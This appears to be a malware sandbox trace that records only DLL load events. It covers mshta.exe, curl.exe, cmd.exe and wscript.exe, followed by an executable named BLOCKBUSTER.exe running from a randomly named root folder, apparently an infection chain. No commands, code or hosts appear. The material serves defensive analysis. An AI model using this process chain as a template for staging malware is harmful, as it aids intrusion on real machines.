Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msxml3.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msdart.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: zipfldr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: apphelp.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: version.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: mpr.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: wininet.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: wsock32.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: winmm.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: uxtheme.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: devobj.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: msasn1.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: c_is2022.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: c_g18030.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: c_gsm7.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: c_iscii.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: netapi32.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: netutils.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: olepro32.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: msimg32.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: kernel.appcore.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: windows.storage.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: wldp.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: unrar.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: 7zxa.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: winhttp.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: shfolder.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: magnification.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: urlmon.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: iphlpapi.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: iertutil.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: srvcli.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: wtsapi32.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: d3d9.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: dwmapi.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: security.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: secur32.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: sspicli.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: winsta.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: wkscli.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: cscapi.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: oleacc.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: textshaping.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: mlang.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: textinputframework.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: coreuicomponents.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: coremessaging.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: ntmarta.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: wintypes.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: wintypes.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: wintypes.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe	Section loaded: propsys.dll
